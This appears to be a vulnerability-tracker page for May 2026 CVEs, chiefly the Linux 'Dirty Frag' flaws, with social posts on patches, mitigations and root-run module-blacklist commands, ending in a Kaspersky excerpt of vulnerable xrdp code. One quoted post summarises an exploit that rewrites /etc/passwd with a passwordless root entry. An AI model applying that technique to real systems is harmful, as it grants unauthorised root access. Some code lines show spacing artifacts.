24h | 7d | 30d

Overview

  • Linux
  • Linux

08 May 2026
Published
09 May 2026
Updated

CVSS
Pending
EPSS
0.01%

KEV

Description

In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place over data that is not owned privately by the skb. Mark IPv4/IPv6 datagram splice frags with SKBFL_SHARED_FRAG, matching TCP. Also make ESP input fall back to skb_cow_data() when the flag is present, so ESP does not decrypt externally backed frags in place. Private nonlinear skb frags still use the existing fast path. This intentionally does not change ESP output. In esp_output_head(), the path that appends the ESP trailer to existing skb tailroom without calling skb_cow_data() is not reachable for nonlinear skbs: skb_tailroom() returns zero when skb->data_len is nonzero, while ESP tailen is positive. Thus ESP output will either use the separate destination-frag path or fall back to skb_cow_data().

Statistics

  • 25 Posts
  • 263 Interactions

Last activity: 1 hour ago

Fediverse

Profile picture fallback

2 new vulnerabilities similar to copyfail:

- CVE-2026-43284 (Dirty Frag)
- CVE-2026-43500

github.com/V4bel/dirtyfrag

We're waiting for a release containing the last one before pushing new kernels to aports.

github.com/V4bel/dirtyfrag#mit mentions a mitigation in the meantime.

  • 34
  • 25
  • 0
  • 17h ago
Profile picture fallback

CVE-2026-43284 / "Dirty Frag" .. Antoher one of those nasty local-privilege-escallations.

Quickfix for Centos/Fedora based systems:

printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf && rmmod esp4 esp6 rxrpc 2>/dev/null; true

Caution: That also effectively disables IPSEC and AFS client support. But it can easily be reverted by removing the file when a patched kernel arrives.

#dirtyfrag #cve_2026_43284 #security #centos #fedora #redhat

  • 4
  • 5
  • 0
  • 8h ago
Profile picture fallback

Just got a kernel update from Debian 13's security channel, which fixes both CVE-2026-43284 and CVE-2026-43500, aka "Dirty Frag".

Debian 12 is not yet patched.

Tracker Links:
security-tracker.debian.org/tr
security-tracker.debian.org/tr

#DirtyFrag #Debian #Linux #Kernel #InfoSec

  • 16
  • 23
  • 0
  • 11h ago
Profile picture fallback

L'ensemble de notre parc infogéré est immunisé contre la faille Dirty Frag (CVE-2026-43284) depuis ce matin 08h59.

En gros, c'est l'enfant maudit de Dirty Pipe et Copy Fail qui permet une élévation locale de privilèges qui fonctionne très bien.

En savoir plus sur la faille-> github.com/V4bel/dirtyfrag#dir

  • 3
  • 2
  • 0
  • 21h ago
Profile picture fallback
Happy Frid^WCVE-2026-43284

#Linux #DirtyFrag #CopyFail
  • 2
  • 0
  • 0
  • 21h ago
Profile picture fallback

Nouveaux kernels stables : 7.0.5 / 6.18.28 / 6.12.87 / 6.6.138

Ils embarquent un fix partiel pour (CVE-2026-43284) et Copy Fail 2.

Partiel, car Greg Kroah-Hartman a confirmé qu'un second patch est encore en développement et n'a pas encore été mergé.

La mitigation par blacklist des modules reste donc recommandée en attendant.
👇
lwn.net/Articles/1071775/

  • 0
  • 1
  • 0
  • 19h ago
Profile picture fallback

OhMyDebn 3.7.1 now available with mitigation for Dirty Frag local privilege escalation (CVE-2026-43284)

OhMyDebn is a debonair Linux desktop for power users. It gives you the stability of the Debian distro, the ease of use of the Cinnamon desktop, and the power of AI, containers, and virtualization.

  • 0
  • 1
  • 0
  • 17h ago
Profile picture fallback

[related]
chez AlmaLinux

"Dirty Frag (CVE-2026-43284) vulnerability fix is ready for testing"
👇
almalinux.org/blog/2026-05-07-

  • 0
  • 0
  • 0
  • 19h ago
Profile picture fallback

📰 Critical Unpatched 'Dirty Frag' Linux Zero-Day Allows Instant Root Access

🚨 CRITICAL ZERO-DAY: 'Dirty Frag' (CVE-2026-43284) vulnerability in Linux kernel disclosed with NO PATCH. Allows immediate root privilege escalation. Flaw has existed for 9 years. Admins must seek mitigations now! 🐧🔥 #Linux #ZeroDay #CyberSecurity

🔗 cyber.netsecops.io

  • 0
  • 0
  • 0
  • 10h ago
Profile picture fallback

@jschauma About istheinternetonfire.com/ DirtyFrag now has one CVE (two, actually) CVE-2026-43284 and CVE-2026-43500

  • 2
  • 2
  • 0
  • 15h ago
Profile picture fallback

"Dirty Frag" status update on the clickbait overhype: ESP half (CVE-2026-43284) now patched: mainline f4c50a4034e6, stable backports in 7.0.5 / 6.18.28 / 6.12.87 / 6.6.138 / 6.1.171 / 5.15.205 / 5.10.255. RxRPC half (CVE-2026-43500) still unpatched upstream. AWS now adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc, adjacent xfrm code paths, defense in depth or a hint more is coming. AlmaLinux and CloudLinux shipped both fixes. Ubuntu, Debian, RHEL, Amazon still mitigation only.

  • 2
  • 2
  • 0
  • 6h ago
Profile picture fallback

As I haven't seen this in my timeline yet:
There is another #Linux #zeroday privilege escalation #vulnerability.
No, not copy_fail, a new one, called DirtyFrag, combining CVE-2026-43284 and CVE-2026-43500

Apparently the finder was gonna disclose this responsibly, but they claim the embargo was broken by a third party.

Most probably not patched yet in distros, but fix (at least for one of the CVEs) is in mainline.

github.com/V4bel/dirtyfrag

A workaround/mitigation exists: github.com/V4bel/dirtyfrag#mit

  • 1
  • 3
  • 0
  • 14h ago
Profile picture fallback

Les deux vulnérabilités composant ont reçu leurs numéros CVE :

🔴 CVE-2026-43284 — xfrm-ESP Page-Cache Write (patché en mainline : f4c50a4034e6)
🟡 CVE-2026-43500 — RxRPC Page-Cache Write

Si ce n'est pas encore fait, la mitigation reste de blacklister esp4, esp6 et rxrpc.
👇
vulnerability.circl.lu/vuln/CV

  • 1
  • 0
  • 0
  • 19h ago
Profile picture fallback
[ Linux KernelのLPE(Local Privilege Escalation)脆弱性(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG ]
https://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/
  • 0
  • 0
  • 0
  • 16h ago
Profile picture fallback

Did you update your Linux kernel again to protect against the last privilege escalation bug?

No, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).

  • 1
  • 4
  • 0
  • 9h ago

Bluesky

Profile picture fallback
CVE-2026-43284がアサインされた模様です。 www.cve.org/CVERecord?id...
  • 0
  • 0
  • 0
  • 21h ago
Profile picture fallback
A newly disclosed Linux local privilege escalation vulnerability known as “Dirty Frag” enables escalation from an unprivileged user to root through vulnerable kernel networking & memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). msft.it/6015v3WNc
  • 5
  • 6
  • 0
  • 11h ago
Profile picture fallback
"Dirty Frag" Linux Kernel LPE Zero-Day (CVE-2026-43284, CVE-2026-43500) #patchmanagement
  • 1
  • 0
  • 0
  • 10h ago
Profile picture fallback
"Dirty Frag" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. Ubuntu/Debian mitigation only.
  • 0
  • 1
  • 0
  • 6h ago
Profile picture fallback
📢 Dirty Frag : deux vulnérabilités Linux permettent l'élévation de privilèges root (CVE-2026-43284 / CVE-2026-43500) 📝 #… https://cyberveille.ch/posts/2026-05-08-dirty-frag-deux-vulnerabilites-linux-permettent-l-elevation-de-privileges-root-cve-2026-43284-cve-2026-43500/ #CVE_2026_43284 #Cyberveille
  • 0
  • 0
  • 0
  • 14h ago
Profile picture fallback
~Cybergcca~ Alert on unpatched Linux LPE flaws (Dirty Frag) with active PoCs, plus Edge & cPanel updates. - IOCs: CVE-2026-43284, CVE-2026-43500 - #Linux #ThreatIntel #Vulnerability
  • 0
  • 0
  • 0
  • 9h ago
Profile picture fallback
DirtyFrag exploits two Linux kernel bugs, CVE-2026-43284 and CVE-2026-43500, enabling local root access on major distros including Ubuntu, RHEL, Fedora, CentOS Stream, AlmaLinux, and openSUSE. #LinuxRoot #KernelExploit #USA
  • 0
  • 0
  • 0
  • 8h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 19 Posts
  • 255 Interactions

Last activity: 1 hour ago

Fediverse

Profile picture fallback

2 new vulnerabilities similar to copyfail:

- CVE-2026-43284 (Dirty Frag)
- CVE-2026-43500

github.com/V4bel/dirtyfrag

We're waiting for a release containing the last one before pushing new kernels to aports.

github.com/V4bel/dirtyfrag#mit mentions a mitigation in the meantime.

  • 34
  • 25
  • 0
  • 17h ago
Profile picture fallback

and we have another one. This one with CVE.

#dirtyfrag #CVE-2026-43500

  • 6
  • 4
  • 0
  • 14h ago
Profile picture fallback

Just got a kernel update from Debian 13's security channel, which fixes both CVE-2026-43284 and CVE-2026-43500, aka "Dirty Frag".

Debian 12 is not yet patched.

Tracker Links:
security-tracker.debian.org/tr
security-tracker.debian.org/tr

#DirtyFrag #Debian #Linux #Kernel #InfoSec

  • 16
  • 23
  • 0
  • 11h ago
Profile picture fallback

Why wait for the slow UEFI when you can just `systemctl kexec` to remediate Dirty Frag with (almost) sub- 1 Minute downtime (2nd reboot for CVE-2026-43500 follows)
(all VMs except the pinned ones have been migrated off before)

  • 0
  • 0
  • 0
  • 15h ago
Profile picture fallback

@jschauma About istheinternetonfire.com/ DirtyFrag now has one CVE (two, actually) CVE-2026-43284 and CVE-2026-43500

  • 2
  • 2
  • 0
  • 15h ago
Profile picture fallback

"Dirty Frag" status update on the clickbait overhype: ESP half (CVE-2026-43284) now patched: mainline f4c50a4034e6, stable backports in 7.0.5 / 6.18.28 / 6.12.87 / 6.6.138 / 6.1.171 / 5.15.205 / 5.10.255. RxRPC half (CVE-2026-43500) still unpatched upstream. AWS now adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc, adjacent xfrm code paths, defense in depth or a hint more is coming. AlmaLinux and CloudLinux shipped both fixes. Ubuntu, Debian, RHEL, Amazon still mitigation only.

  • 2
  • 2
  • 0
  • 6h ago
Profile picture fallback

As I haven't seen this in my timeline yet:
There is another #Linux #zeroday privilege escalation #vulnerability.
No, not copy_fail, a new one, called DirtyFrag, combining CVE-2026-43284 and CVE-2026-43500

Apparently the finder was gonna disclose this responsibly, but they claim the embargo was broken by a third party.

Most probably not patched yet in distros, but fix (at least for one of the CVEs) is in mainline.

github.com/V4bel/dirtyfrag

A workaround/mitigation exists: github.com/V4bel/dirtyfrag#mit

  • 1
  • 3
  • 0
  • 14h ago
Profile picture fallback

Les deux vulnérabilités composant ont reçu leurs numéros CVE :

🔴 CVE-2026-43284 — xfrm-ESP Page-Cache Write (patché en mainline : f4c50a4034e6)
🟡 CVE-2026-43500 — RxRPC Page-Cache Write

Si ce n'est pas encore fait, la mitigation reste de blacklister esp4, esp6 et rxrpc.
👇
vulnerability.circl.lu/vuln/CV

  • 1
  • 0
  • 0
  • 19h ago
Profile picture fallback
[ Linux KernelのLPE(Local Privilege Escalation)脆弱性(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG ]
https://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/
  • 0
  • 0
  • 0
  • 16h ago
Profile picture fallback

Did you update your Linux kernel again to protect against the last privilege escalation bug?

No, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).

  • 1
  • 4
  • 0
  • 9h ago

Bluesky

Profile picture fallback
CVE-2026-43500も追加でアサインされるそうです(まだCVE自体は公開されていません)
  • 0
  • 0
  • 0
  • 19h ago
Profile picture fallback
A newly disclosed Linux local privilege escalation vulnerability known as “Dirty Frag” enables escalation from an unprivileged user to root through vulnerable kernel networking & memory-fragment handling components, including esp4, esp6 (CVE-2026-43284), and rxrpc (CVE-2026-43500). msft.it/6015v3WNc
  • 5
  • 6
  • 0
  • 11h ago
Profile picture fallback
"Dirty Frag" Linux Kernel LPE Zero-Day (CVE-2026-43284, CVE-2026-43500) #patchmanagement
  • 1
  • 0
  • 0
  • 10h ago
Profile picture fallback
"Dirty Frag" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. Ubuntu/Debian mitigation only.
  • 0
  • 1
  • 0
  • 6h ago
Profile picture fallback
📢 Dirty Frag : deux vulnérabilités Linux permettent l'élévation de privilèges root (CVE-2026-43284 / CVE-2026-43500) 📝 #… https://cyberveille.ch/posts/2026-05-08-dirty-frag-deux-vulnerabilites-linux-permettent-l-elevation-de-privileges-root-cve-2026-43284-cve-2026-43500/ #CVE_2026_43284 #Cyberveille
  • 0
  • 0
  • 0
  • 14h ago
Profile picture fallback
~Cybergcca~ Alert on unpatched Linux LPE flaws (Dirty Frag) with active PoCs, plus Edge & cPanel updates. - IOCs: CVE-2026-43284, CVE-2026-43500 - #Linux #ThreatIntel #Vulnerability
  • 0
  • 0
  • 0
  • 9h ago
Profile picture fallback
DirtyFrag exploits two Linux kernel bugs, CVE-2026-43284 and CVE-2026-43500, enabling local root access on major distros including Ubuntu, RHEL, Fedora, CentOS Stream, AlmaLinux, and openSUSE. #LinuxRoot #KernelExploit #USA
  • 0
  • 0
  • 0
  • 8h ago

Overview

  • Ivanti
  • Endpoint Manager Mobile

07 May 2026
Published
08 May 2026
Updated

CVSS v3.1
HIGH (7.2)
EPSS
5.01%

Description

An Improper Input Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access to achieve remote code execution.

Statistics

  • 12 Posts
  • 6 Interactions

Last activity: 14 hours ago

Fediverse

Profile picture fallback

New Ivanti EPMM Zero-Day CVE-2026-6973 Actively Exploited — Patch Immediately
#CyberSecurity
securebulletin.com/new-ivanti-

  • 4
  • 0
  • 0
  • 20h ago
Profile picture fallback

🚨 Ivanti Endpoint Manager Mobile flaw (CVE-2026-6973) is being exploited in limited attacks, enabling remote code execution with admin access.

CISA has added it to its KEV catalog, with federal agencies ordered to patch by May 10, 2026.

Read: thehackernews.com/2026/05/ivan

  • 0
  • 1
  • 0
  • 21h ago
Profile picture fallback

CISA KEV update May 7: CVE-2026-6973 Ivanti EPMM added. Actively exploited input validation flaw. Federal deadline applies, everyone else should patch. - cisa.gov/news-events/alerts/20

  • 0
  • 0
  • 0
  • 16h ago
Profile picture fallback

Tracked as CVE-2026-6973, this security flaw allows attackers with administrative privileges to execute arbitrary code remotely on systems running EPMM 12.8.0.0 and earlier. bleepingcomputer.com/news/secu

  • 0
  • 0
  • 1
  • 16h ago

Bluesky

Profile picture fallback
Ivanti EPMM vulnerability exploited in zero-day attacks (CVE-2026-6973) www.helpnetsecurity.com/2026/05/08/i...
  • 0
  • 1
  • 0
  • 15h ago
Profile picture fallback
Ivanti reveals CVE-2026-6973, a critical remote code execution flaw in Endpoint Manager Mobile 12.8.0.0 and earlier, exploited in limited zero-day attacks. Additional patches released, admins urged to review credentials. #Ivanti #ZeroDay #USA
  • 0
  • 0
  • 0
  • 22h ago
Profile picture fallback
Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access reconbee.com/ivanti-epmm-... #Ivanti #EPMM #adminlevelaccess #cybersecurity #cyberattack
  • 0
  • 0
  • 0
  • 22h ago
Profile picture fallback
Ivanti released patches for five vulnerabilities in Endpoint Manager Mobile, including CVE-2026-6973, a zero-day exploited in targeted attacks allowing remote code execution by authenticated admins. #IvantiPatch #ZeroDay #USA
  • 0
  • 0
  • 1
  • 21h ago
Profile picture fallback
Ivanti EPMM vulnerability exploited in zero-day attacks (CVE-2026-6973) 📖 Read more: www.helpnetsecurity.com/2026/05/08/i... #cybersecurity #cybersecuritynews #0day #endpointmanagement #vulnerability
  • 0
  • 0
  • 0
  • 18h ago
Profile picture fallback
Ivanti: We are aware of a very limited number of customers exploited with CVE-2026-6973. Successful exploitation requires Admin authentication.
  • 0
  • 0
  • 0
  • 14h ago

Overview

  • Palo Alto Networks
  • Cloud NGFW

06 May 2026
Published
07 May 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
4.65%

Description

A buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets. The risk of this issue is greatly reduced if you secure access to the User-ID™ Authentication Portal per the best practice guidelines https://knowledgebase.paloaltonetworks.com/KCSArticleDetail by restricting access to only trusted internal IP addresses. Prisma Access, Cloud NGFW and Panorama appliances are not impacted by this vulnerability.

Statistics

  • 7 Posts

Last activity: 10 hours ago

Fediverse

Profile picture fallback

The vulnerability in question is CVE-2026-0300 (CVSS score: 9.3/8.7), a buffer overflow vulnerability in the User-ID Authentication Portal service of Palo Alto Networks PAN-OS software that could allow an unauthenticated attacker to execute arbitrary code with root privileges by sending specially crafted packets. thehackernews.com/2026/05/pan-

  • 0
  • 0
  • 1
  • 16h ago
Profile picture fallback

📰 Critical Palo Alto Networks Zero-Day (CVE-2026-0300) Actively Exploited for RCE

🚨 CRITICAL ZERO-DAY: Palo Alto Networks warns of an unpatched, actively exploited RCE vulnerability (CVE-2026-0300) in PAN-OS firewalls. The flaw allows root access via the User-ID portal. Mitigate immediately! #CyberSecurity #ZeroDay #PANOS

🔗 cyber.netsecops.io

  • 0
  • 0
  • 0
  • 10h ago

Bluesky

Profile picture fallback
⚠️ Une faille critique dans #PaloAlto PAN-OS (CVE-2026-0300) permet une exécution de code à distance sans authentification. Exploitation active détectée sur le terrain. Score CVSS : 9.3. #CyberSecurity #Automatisation
  • 0
  • 0
  • 0
  • 23h ago
Profile picture fallback
Palo Alto Networks reveals active exploitation of zero-day CVE-2026-0300 in PA and VM firewalls, enabling unauthenticated root access. Attack linked to Chinese state group CL-STA-1132 using Earthworm and ReverseSocks5. #China #PaloAlto #ZeroDay
  • 0
  • 0
  • 0
  • 21h ago
Profile picture fallback
【脆弱性】CVE-2026-0300とは?Palo Alto Networks製PAN-OSの重大脆弱性と企業が取るべき対策を解説 2026年5月、Palo Alto NetworksのファイアウォールOS「PAN-OS」に関する重大な脆弱性「CVE-2026-0300」が公表されました。この脆弱性は、条件を満たす機器に対して外部から攻撃されるおそれがあり、すでに実際の悪用も確認されています。
  • 0
  • 0
  • 0
  • 20h ago
Profile picture fallback
📢 Exploitation active de CVE-2026-0300 : RCE critique dans PAN-OS par un acteur étatique 📝 ## 🗓️ Contexte Publié le 8 mai 2026 par Truesec, cet art… https://cyberveille.ch/posts/2026-05-08-exploitation-active-de-cve-2026-0300-rce-critique-dans-pan-os-par-un-acteur-etatique/ #CL_STA_1132 #Cyberveille
  • 0
  • 0
  • 0
  • 14h ago

Overview

  • Linux
  • Linux

22 Apr 2026
Published
08 May 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
3.91%

Description

In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

Statistics

  • 5 Posts
  • 35 Interactions

Last activity: 9 hours ago

Fediverse

Profile picture fallback

⚠️ PSA: patch your AlmaLinux systems.

Copy Fail lets any local user escalate to root. We shipped fixes for AL 8, 9 & 10 ahead of upstream—they're in production now. almalinux.org/blog/2026-05-01-

  • 13
  • 12
  • 1
  • 13h ago
Profile picture fallback

variante peu sympa 👀
"Unprivileged Linux LPE via xfrm ESP-in-UDP MSG_SPLICE_PAGES no-COW fast path. Page-cache write into any readable file. Overwrites a nologin line in /etc/passwd with sick::0:0:...:/:/bin/bash and sus into it. Same class as Copy Fail (CVE-2026-31431), different subsystem."
⬇️
github.com/0xdeadbeefnetwork/C

  • 0
  • 0
  • 0
  • 20h ago
Profile picture fallback

Did you update your Linux kernel again to protect against the last privilege escalation bug?

No, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).

  • 1
  • 4
  • 0
  • 9h ago

Bluesky

Profile picture fallback
Similar to the previously disclosed Copy Fail vulnerability (CVE-2026-31431), the exploit attempts to manipulate Linux page cache behavior to achieve privilege escalation. However, Dirty Frag introduces additional attack paths that expand exploitation opportunities and improve reliability.
  • 0
  • 5
  • 0
  • 11h ago

Overview

  • FreeBSD
  • FreeBSD

30 Apr 2026
Published
01 May 2026
Updated

CVSS
Pending
EPSS
0.02%

KEV

Description

An operator precedence bug in the kernel results in a scenario where a buffer overflow causes attacker-controlled data to overwrite adjacent execve(2) argument buffers. The bug may be exploitable by an unprivileged user to obtain superuser privileges.

Statistics

  • 1 Post
  • 28 Interactions

Last activity: 23 hours ago

Bluesky

Profile picture fallback
CVE-2026-7270: root on FreeBSD with a shell script :( blog.calif.io/p/cve-2026-7...
  • 13
  • 15
  • 0
  • 23h ago

Overview

  • WebPros
  • cPanel

29 Apr 2026
Published
06 May 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
64.28%

Description

cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.

Statistics

  • 2 Posts
  • 1 Interaction

Last activity: 13 hours ago

Fediverse

Profile picture fallback

CVE-2026-41940 was exploited for 64 days before a patch existed. First attack: Feb 23. Advisory: Apr 28.

After disclosure, 15,448 cPanel hosts in malicious activity on May 1 alone. Ransomware and a Mirai botnet running in parallel. CVSS 9.8. CISA KEV.

We built a free scanner. No account needed.

pentest-tools.com/network-vuln

  • 0
  • 1
  • 0
  • 22h ago

Bluesky

Profile picture fallback
📢 CVE-2026-41940 : exploitation massive de cPanel/WHM avec déploiement de Mirai et ransomware 📝 ## 🔍 Contexte Le 1er mai 2026, l'équipe Ce… https://cyberveille.ch/posts/2026-05-08-cve-2026-41940-exploitation-massive-de-cpanel-whm-avec-deploiement-de-mirai-et-ransomware/ #CVE_2026_41940 #Cyberveille
  • 0
  • 0
  • 0
  • 13h ago

Overview

  • FreeBSD
  • FreeBSD

30 Apr 2026
Published
01 May 2026
Updated

CVSS
Pending
EPSS
0.06%

KEV

Description

The BOOTP file field is written to the lease file without escaping embedded double-quotes, allowing injection of arbitrary dhclient.conf directives. When the lease file is subsequently re-parsed by dhclient, e.g., after a system restart, an attacker-controlled field from the lease is passed to dhclient-script(8), which evaluates it. A rogue DHCP server may be able to execute arbirary code as root on a system running dhclient.

Statistics

  • 2 Posts
  • 1 Interaction

Last activity: 22 hours ago

Bluesky

Profile picture fallback
[RSS] CVE-2026-42511 Breakdown: RCE in FreeBSD aisle.com -> Original->
  • 0
  • 1
  • 0
  • 22h ago

Overview

  • Pending

23 Apr 2026
Published
23 Apr 2026
Updated

CVSS
Pending
EPSS
0.03%

KEV

Description

Yadea T5 Electric Bicycles (models manufactured in/after 2024) have a weak authentication mechanism in their keyless entry system. The system utilizes the EV1527 fixed-code RF protocol without implementing rolling codes or cryptographic challenge-response mechanisms. This is vulnerable to signal forgery after a local attacker intercepts any legitimate key fob transmission, allowing for complete unauthorized vehicle operation via a replay attack.

Statistics

  • 2 Posts

Last activity: 13 hours ago

Bluesky

Profile picture fallback
📢 CVE-2025-70994 : Vulnérabilité de replay attack sur le vélo électrique Yadea T5 via protocole EV1527 📝 ## 🔍 Contexte Publié le 8 mai 2026… https://cyberveille.ch/posts/2026-05-08-cve-2025-70994-vulnerabilite-de-replay-attack-sur-le-velo-electrique-yadea-t5-via-protocole-ev1527/ #CISA #Cyberveille
  • 0
  • 0
  • 0
  • 13h ago

Overview

  • neutrinolabs
  • xrdp

27 Jan 2026
Published
03 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.1)
EPSS
0.12%

KEV

Description

xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If exploited, the vulnerability could allow remote attackers to execute arbitrary code on the target system. The vulnerability allows an attacker to overwrite the stack buffer and the return address, which could theoretically be used to redirect the execution flow. The impact of this vulnerability is lessened if a compiler flag has been used to build the xrdp executable with stack canary protection. If this is the case, a second vulnerability would need to be used to leak the stack canary value. Upgrade to version 0.10.5 to receive a patch. Additionally, do not rely on stack canary protection on production systems.

Statistics

  • 2 Posts

Last activity: 16 hours ago

Fediverse

Profile picture fallback

CVE-2025-68670: discovering an RCE vulnerability in xrdp

In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

Client data transmission via RDP


Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;

// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}

while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}

v n -= u8len;
v += u8len;
}

else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}

r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

CVE-2025-68670: an RCE vulnerability in xrdp


The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
